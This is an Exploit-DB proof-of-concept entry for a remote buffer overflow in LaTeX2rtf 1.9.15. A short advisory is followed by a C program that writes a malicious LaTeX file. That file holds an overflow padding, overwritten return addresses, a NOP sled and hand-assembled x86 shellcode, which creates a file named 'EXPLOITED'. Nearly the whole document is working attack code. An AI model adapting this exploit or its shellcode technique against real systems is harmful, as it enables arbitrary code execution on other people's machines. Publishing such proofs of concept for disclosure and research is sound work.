LaTeX2rtf 1.9.15 - Remote Buffer Overflow

EDB-ID: 24622
Platform: Linux
Date: 2004-09-21


/*
source: https://www.securityfocus.com/bid/11233/info

It is reported that LaTeX2rtf is susceptible to a remote buffer overflow vulnerability when handling malformed files. This vulnerability may allow a remote attacker to execute arbitrary code on a vulnerable computer to gain unauthorized access. The issue is due to the application failing to perform proper bounds checks before copying data into a fixed-size memory buffer.

Version 1.9.15 of LaTeX2rtf is reported vulnerable to this issue. Other versions may also be affected.
*/

#include <stdio.h>

char center[] = {
  0x59                         /*   cx = *sp++                      */
, 0x31, 0xc0                   /*   ax ^= ax                        */
, 0x40                         /*   ++ax                            */
, 0x40                         /*   ++ax                            */
, 0x40                         /*   ++ax                            */
, 0xc1, 0xe0, 0x07             /*   ax <<= 7                        */
, 0x50                         /*   *--sp = ax                 0600 */
, 0xb8, 0x12, 0x34, 0x56, 0x02 /*   ax = 0x02563412                 */
, 0xc1, 0xe8, 0x18             /*   ax >>= 24                       */
, 0xc1, 0xe0, 0x08             /*   ax <<= 8                        */
, 0x50                         /*   *--sp = ax          512:O_CREAT */
, 0x51                         /*   *--sp = cx          "EXPLOITED" */
, 0x31, 0xc0                   /*   ax ^= ax                        */
, 0xb0, 0x05                   /*   ax = (ax & ~255) + 5            */
, 0x50                         /*   *--sp = ax               5:open */
, 0xcd, 0x80                   /*   syscall                         */
, 0x31, 0xc0                   /*   ax ^= ax                        */
, 0x50                         /*   *--sp = ax                    0 */
, 0x40                         /*   ++ax                            */
, 0x50                         /*   *--sp = ax               1:exit */
, 0xcd, 0x80                   /*   syscall                         */
} ;

int main()
{
  int i;

  printf("\\def\\row#1{");

  for (i = 0;i < 1024;++i)
    putchar('x');
  for (i = 0;i < 6;++i) {
    /* preserve args[0] */
    putchar(0x40); putchar(0x6d); putchar(0x08); putchar(0x08);
  }
  for (i = 0;i < 5;++i) {
    /* smasher */
    putchar(0x40); putchar(0xf9); putchar(0xbf); putchar(0xbf);
  }

  for (i = 0;i < 256;++i)
    putchar(0x90);

  putchar(0xeb); putchar(sizeof(center));
  /* 0xeb 0x07   means   ip += 7 */
  /* assuming here that center has at most 255 bytes */

  for (i = 0;i < sizeof center;++i)
    putchar(center[i]);

  putchar(0xe8);
  putchar(251 - sizeof center); putchar(0xff); putchar(0xff); putchar(0xff);
  /* 0xe8 0xf4 0xff 0xff 0xff   means   *--sp = ip; ip -= 12 */ 

  printf("EXPLOITED");

  printf("}\n");
  printf("\\begin{document}\n");
  printf("\\row a\n");
  printf("\\end{document}\n");
}